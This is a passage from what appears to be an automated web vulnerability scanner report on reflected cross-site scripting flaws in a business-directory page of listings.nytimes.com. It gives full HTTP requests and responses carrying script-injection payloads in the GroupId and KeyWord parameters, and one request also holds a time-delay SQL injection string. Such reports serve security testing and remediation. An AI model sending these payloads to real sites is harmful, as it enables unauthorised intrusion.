<h1>Form</h1>AdTagCountyId=1 AND 'NS='ss&AdTagPriceIndx=3&Amenities=3&CategoryId=BIZDIR&ChangeEmail=netsparker%40example.com&ctRS=10&GroupId=3bd930<script>alert(1)</script>3775acfcd22&intl=3&KeyWord=3&Lid=3&LIndex=3&RegionId=3&SoL=3&strLsId=80-N1011083%2c80-N1009073%2c80-N906131%2c80-N1011114%2c80-N1011021%2c80-N1008162%2c80-N1011102%2c80-N1009292%2c80-N1011022%2c80-N1010281&strSta
...[SNIP]...

4.195. http://listings.nytimes.com/BusinessDirectory/List_Listings.asp [GroupId parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://listings.nytimes.com
Path:   /BusinessDirectory/List_Listings.asp

Issue detail

The value of the GroupId request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ea4e4"><script>alert(1)</script>a8ffb7b062cca42c9 was submitted in the GroupId parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method; however, it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /BusinessDirectory/List_Listings.asp?AdTagCountyId=&AdTagPriceIndx=&CategoryId=BIZDIR&ChangeEmail=&cid=999&DOrder=A&GroupId=ea4e4"><script>alert(1)</script>a8ffb7b062cca42c9&intl=&KeyWord=&LastPage=40&LOrder=A&NOrder=A&Order=A&POrder=A&RegionId=&ROrder=A&RSCount=2500&sLsIds0=80-N1011083%2c80-N1009073%2c80-N906131%2c80-N1011114%2c80-N1011021%2c80-N1008162%2c80-N1011102%2c80-N1009292%2c80-N1011022%2c80-N1010281&sLsIds1=80-N1010223%2c80-N1010192%2c80-N1011111%2c80-N1011051%2c80-N1010272%2c80-N1011071%2c80-N1009282%2c80-N1010211%2c80-N1011121%2c80-N1009242&sLsIds2=80-N1010218%2c20-1000297132_020%2c125-454145%2c125-500168%2c125-561603%2c125-557500%2c125-505633%2c125-502057%2c125-569378%2c125-451879&sLsIds3=125-563290%2c125-492069%2c125-487258%2c125-473954%2c125-516760%2c125-529105%2c125-529136%2c125-565044%2c125-452044%2c125-471500&sLsIds4=125-558791%2c125-555521%2c125-561463%2c125-549434%2c125-434068%2c125-530728%2c125-564022%2c125-557581%2c125-560091%2c125-563157&sLsIds5=125-491745%2c125-547950%2c125-509222%2c125-568138%2c125-557766%2c125-559177%2c125-537020%2c125-506111%2c125-560157%2c125-566240&sLsIds6=125-557675%2c125-551396%2c125-559267%2c125-533573%2c125-458445%2c125-538467%2c125-471913%2c125-482897%2c125-535950%2c125-499401&sLsIds7=125-486445%2c125-529496%2c125-429362%2c125-501989%2c125-502772%2c125-534073%2c125-530131%2c125-494155%2c125-517168%2c125-557932&sLsIds8=125-514452%2c125-541145%2c125-416753%2c125-444446%2c125-537604%2c125-502641%2c125-567841%2c125-564153%2c20-1000290506_030%2c125-570359&sLsIds9=125-539476%2c125-431610%2c125-442946%2c125-560310%2c125-497124%2c125-529949%2c125-568533%2c125-558371%2c125-553006%2c125-553112&sLsIdsA=125-560826%2c125-549432%2c125-552794%2c125-545063%2c125-552800%2c125-549795%2c125-552790%2c125-552796%2c125-551814%2c125-545983&sLsIdsAA=125-553610%2c125-518851%2c125-553607%2c125-556074%2c125-558240%2c125-499512%2c125-526065%2c125-462985%2c125-544762%2c125-560817&sLsIdsAB=125-522621%2c125-567005%2c125-364577%2c125-333056%2c
125-565752%2c125-389754%2c125-405051%2c125-558962%2c125-441721%2c125-542506&sLsIdsAC=125-521855%2c125-495755%2c125-503906%2c125-565552%2c125-556750%2c125-475131%2c125-202650%2c125-510030%2c125-570191%2c125-475695&sLsIdsAD=125-555585%2c125-565528%2c125-520249%2c125-541247%2c125-556121%2c125-547008%2c125-568447%2c125-545194%2c125-512492%2c125-297311&sLsIdsB=125-551828%2c125-552791%2c125-552803%2c125-453304%2c125-552666%2c125-521482%2c125-521477%2c125-521479%2c125-488823%2c125-545359&sLsIdsC=125-527579%2c125-525464%2c125-527584%2c125-475581%2c125-510064%2c125-565038%2c125-554987%2c125-559008%2c125-525927%2c125-526128&sLsIdsD=125-526018%2c125-526144%2c125-529057%2c125-567748%2c125-526023%2c125-555190%2c125-559612%2c125-555175%2c125-554984%2c125-547837&sLsIdsE=125-547750%2c125-548054%2c125-525923%2c125-494906%2c125-531825%2c125-550469%2c125-567828%2c125-490106%2c125-566918%2c125-529618&sLsIdsF=125-463922%2c125-464100%2c125-488817%2c125-557391%2c125-522086%2c125-548195%2c125-553895%2c125-558344%2c125-564715%2c125-556870&sLsIdsG=125-554611%2c125-518058%2c125-532291%2c125-532292%2c125-482057%2c125-569094%2c125-555551%2c125-462478%2c125-469804%2c125-500828&sLsIdsH=125-504736%2c125-521946%2c125-517146%2c125-518850%2c125-524081%2c125-527129%2c125-527511%2c125-527508%2c125-528677%2c125-533450&sLsIdsI=125-540051%2c125-544122%2c125-549166%2c125-546131%2c125-550891%2c125-563445%2c125-560883%2c125-560309%2c125-565198%2c125-565179&sLsIdsJ=125-566478%2c125-566482%2c125-564856%2c125-565126%2c125-569444%2c125-531599%2c125-550866%2c125-560171%2c125-539587%2c125-567941&sLsIdsK=125-566956%2c125-513013%2c125-493766%2c125-521916%2c125-522018%2c125-554134%2c125-521507%2c125-521264%2c125-541992%2c125-521281&sLsIdsL=125-557904%2c125-565259%2c125-442451%2c125-551241%2c125-488296%2c125-568500%2c125-569515%2c125-548226%2c125-559444%2c125-565130&sLsIdsM=125-395953%2c125-491487%2c125-444457%2c125-464308%2c125-454440%2c125-454446%2c125-472602%2c125-418913%2c125-422194%2c125-561731&sLsIdsN=125-483424
%2c125-471203%2c125-430646%2c125-436208%2c125-561736%2c125-394065%2c125-539553%2c125-454345%2c125-463424%2c125-470693&sLsIdsO=125-470909%2c125-481310%2c125-486834%2c125-490712%2c125-419767%2c125-497400%2c125-561713%2c125-496638%2c125-498359%2c125-499448&sLsIdsP=125-499423%2c125-499451%2c125-500061%2c125-500014%2c125-501827%2c125-504342%2c125-505889%2c125-505964%2c125-507572%2c125-561739&sLsIdsQ=125-512454%2c125-531166%2c125-510950%2c125-519482%2c125-550392%2c125-486912%2c125-560934%2c125-555722%2c125-562036%2c125-555902&sLsIdsR=125-493413%2c125-548107%2c125-566195%2c125-549209%2c125-496651%2c125-550801%2c125-551463%2c125-564528%2c125-544691%2c125-511935&sLsIdsS=125-513610%2c125-514528%2c125-514558%2c125-518925%2c125-534894%2c125-519626%2c125-521135%2c125-521146%2c125-531280%2c125-524507&sLsIdsT=125-524511%2c125-548214%2c125-523820%2c125-561740%2c125-535592%2c125-526559%2c125-561743%2c125-543364%2c125-526572%2c125-535768&sLsIdsU=125-561744%2c125-540337%2c125-530055%2c125-539271%2c125-533352%2c125-534277%2c125-554091%2c125-535784%2c125-536134%2c125-536168&sLsIdsV=125-537139%2c125-538939%2c125-537922%2c125-561745%2c125-540042%2c125-542538%2c125-561832%2c125-560772%2c125-561851%2c125-554861&sLsIdsW=125-545138%2c125-561852%2c125-561853%2c125-561855%2c125-561856%2c125-561860%2c125-553593%2c125-561861%2c125-557156%2c125-561863&sLsIdsX=125-560787%2c125-555117%2c125-555993%2c125-560783%2c125-558689%2c125-557187%2c125-557539%2c125-560788%2c125-560650%2c125-562241&sLsIdsY=125-564252%2c125-472625%2c125-565009%2c125-565408%2c125-565406%2c125-566364%2c125-566155%2c125-566429%2c125-569520%2c125-560929&sLsIdsZ=125-490731%2c125-505509%2c125-552073%2c125-512867%2c125-528218%2c125-528217%2c125-546102%2c125-564120%2c125-564628%2c125-528175&SoL=&SOrder=A&Sort=D&strRegion=all+areas&strRegions=5%2bAll+Areas%3a%3a50000%2bAlabama%3a%3a51000%2bAlaska%3a%3a52000%2bArizona%3a%3a53000%2bArkansas%3a%3a54100%2bCalifornia%3a%3a55000%2bColorado%3a%3a56000%2bConnecticut%3a%3a57000%2bDelaware%3a%3a59
100%2bFlorida%3a%3a60000%2bGeorgia%3a%3a61000%2bHawaii%3a%3a62000%2bIdaho%3a%3a63000%2bIllinois%3a%3a64000%2bIndiana%3a%3a65000%2bIowa%3a%3a66000%2bKansas%3a%3a67000%2bKentucky%3a%3a68100%2bLouisiana%3a%3a69000%2bMaine%3a%3a70000%2bMaryland%3a%3a71200%2bMassachusetts%3a%3a72000%2bMichigan%3a%3a73000%2bMinnesota%3a%3a74000%2bMississippi%3a%3a75000%2bMissouri%3a%3a76000%2bMontana%3a%3a77000%2bNebraska%3a%3a78100%2bNevada%3a%3a79000%2bNew+Hampshire%3a%3a80100%2bNew+Jersey%3a%3a81000%2bNew+Mexico%3a%3a2022%2bNew+York%3a%3a82400%2bNew+York+City+Metro+Area%3a%3a83000%2bNorth+Carolina%3a%3a84000%2bNorth+Datoka%3a%3a85000%2bOhio%3a%3a86000%2bOklahoma%3a%3a87000%2bOregon%3a%3a88000%2bPennsylvania%3a%3a89000%2bRhode+Island%3a%3a90000%2bSouth+Carolina%3a%3a91000%2bSouth+Dakota%3a%3a92000%2bTennessee%3a%3a93000%2bTexas%3a%3a94000%2bUtah%3a%3a95000%2bVermont%3a%3a96000%2bVirginia%3a%3a97000%2bWashington%3a%3a58000%2bWashington+D.C.%3a%3a98000%2bWest+Virginia%3a%3a99000%2bWisconsin%3a%3a100000%2bWyoming%3a%3a&strSQL3=Execute+uspSearchListingsByLsIds+'BIZDIR'%2c&strStates=&SubCatId=&ThisPage=1 HTTP/1.1
Referer: http://listings.nytimes.com/BusinessDirectory/List_Listings.asp
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322;)
Cache-Control: no-cache
Host: listings.nytimes.com
Cookie: ASPSESSIONIDSCDTQSBS=CIDMHLFAMCCFKPLBBHALLAAF
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 07:22:01 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 91575
Content-Type: text/html
Set-Cookie: ASPSESSIONIDCADTSTCS=EGIPGLGAIAMPEJGKBOKNFMCK; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >

   
   <head>
       <meta http-equi
...[SNIP]...
<input type="hidden" name="GroupId" value="ea4e4"><script>alert(1)</script>a8ffb7b062cca42c9">
...[SNIP]...

4.196. http://listings.nytimes.com/BusinessDirectory/List_Listings.asp [KeyWord parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://listings.nytimes.com
Path:   /BusinessDirectory/List_Listings.asp

Issue detail

The value of the KeyWord request parameter is copied into the HTML document as plain text between tags. The payload e36a7<script>alert(1)</script>44c7cfaf6039b697a was submitted in the KeyWord parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method; however, it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /BusinessDirectory/List_Listings.asp?ChangeEmail=%27;WAITFOR%20DELAY%20%270:0:25%27--&KeyWord=--+Keyword+--e36a7<script>alert(1)</script>44c7cfaf6039b697a&RegionId=3&SubCatId=3&AdTagCountyId=3&AdTagPriceIndx=3&Amenities=3&CategoryId=BIZDIR&ChangeEmail=netsparker%40example.com&ctRS=10&GroupId=3&intl=3&KeyWord=3&Lid=3&LIndex=3&RegionId=3&SoL=3&strLsId=80-N1011083%2c80-N1009073%2c80-N906131%2c80-N1011114%2c80-N1011021%2c80-N1008162%2c80-N1011102%2c80-N1009292%2c80-N1011022%2c80-N1010281&strStates=3&SubCatId=3&UserEmail=netsparker%40example.com&UserPwd=3 HTTP/1.1
Referer: http://listings.nytimes.com/BusinessDirectory/List_Listings.asp?ChangeEmail=&KeyWord=--+Keyword+--&RegionId=&SubCatId=
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322;)
Cache-Control: no-cache
Host: listings.nytimes.com
Cookie: ASPSESSIONIDSCDTQSBS=CIDMHLFAMCCFKPLBBHALLAAF; ASPSESSIONIDACCRTTDT=EHDHDNGAFBGCHINIICBALKAB; ASPSESSIONIDSCBSSQAT=IBNKJLNDLPHGNPGDKFHLPIOI; ASPSESSIONIDCADQTTDT=ENMHKJGAMFJMFIFDNFGMGMOE; ASPSESSIONIDSABRQSAS=FELKNADAPLOANHOJMNHCBFEN; ASPSESSIONIDCCDTSTDT=JFOLPOGAMCPNEGJMKEMOJBLJ; ASPSESSIONIDSCCSTRAT=EDDDEGAAKEEOJFIKLGKLFKHO
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 07:28:50 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 552
Content-Type: text/html
Cache-control: private

<h1>Form</h1><h1>QueryString</h1>ChangeEmail=%27;WAITFOR%20DELAY%20%270:0:25%27--&KeyWord=--+Keyword+--e36a7<script>alert(1)</script>44c7cfaf6039b697a&RegionId=3&SubCatId=3&AdTagCountyId=3&AdTagPriceIndx=3&Amenities=3&CategoryId=BIZDIR&ChangeEmail=netsparker%40example.com&ctRS=10&GroupId=3&intl=3&KeyWord=3&Lid=3&LIndex=3&RegionId=3&SoL=3&strLsId=80-
...[SNIP]...

4.197. http://listings.nytimes.com/BusinessDirectory/List_Listings.asp [KeyWord parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://listings.nytimes.com
Path:   /BusinessDirectory/List_Listings.asp

Issue detail

The value of the KeyWord request parameter is copied into the HTML document as plain text between